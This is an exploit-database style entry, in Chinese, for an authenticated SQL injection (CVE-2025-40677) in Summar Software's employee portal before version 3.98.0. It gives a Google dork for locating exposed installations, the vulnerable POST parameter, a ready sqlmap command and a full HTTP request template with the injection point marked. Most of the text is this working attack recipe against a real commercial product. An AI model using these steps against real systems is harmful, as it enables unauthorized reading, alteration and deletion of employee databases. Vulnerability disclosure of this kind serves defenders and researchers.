Exploit标题: Summar员工门户 3.98.0 - 经过身份验证的SQL注入

Google搜索关键词: inurl:"/MemberPages/quienesquien.aspx"

日期: 2025年9月22日

漏洞利用作者: Peter Gabaldon - https://pgj11.com/

供应商主页: https://www.summar.es/

软件链接: https://www.summar.es/software-recursos-humanos/

受影响版本: < 3.98.0

测试环境: Kali

CVE编号: CVE-2025-40677

漏洞描述: Summar Software公司的Portal del Empleado（员工门户）存在SQL注入漏洞。此漏洞允许攻击者通过向“/MemberPages/quienesquien.aspx”发送包含参数“ctl00$ContentPlaceHolder1$filtroNombre”的POST请求，来检索、创建、更新和删除数据库。

$ sqlmap –random-agent -r req.sqli.xml -p ‘ctl00%24ContentPlaceHolder1%24filtroNombre’ –dbms=“MSSQL”

POST /MemberPages/quienesquien.aspx HTTP/1.1 Host: [已隐去] Cookie: [已隐去] User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br X-Requested-With: XMLHttpRequest X-Microsoftajax: Delta=true Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded; charset=utf-8 Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin Te: trailers Connection: keep-alive

ctl00%24ScriptManager1=ctl00%24ScriptManager1%7Cctl00%24ContentPlaceHolder1%24lnkVerTrabajador&ctl00%24ContentPlaceHolder1%24filtroNombre=[SQL_INJECTION_POINT]&ctl00%24ContentPlaceHolder1%24ddlEmpresa=&ctl00%24ContentPlaceHolder1%24filtroCentro=&ctl00%24ContentPlaceHolder1%24filtroUO=&ctl00%24ContentPlaceHolder1%24filtroPuesto=&__EVENTTARGET=ctl00%24ContentPlaceHolder1%24lnkVerTrabajador&__EVENTARGUMENT=&__LASTFOCUS=&__VIEWSTATE=…&__VIEWSTATEGENERATOR=…&__ASYNCPOST=true&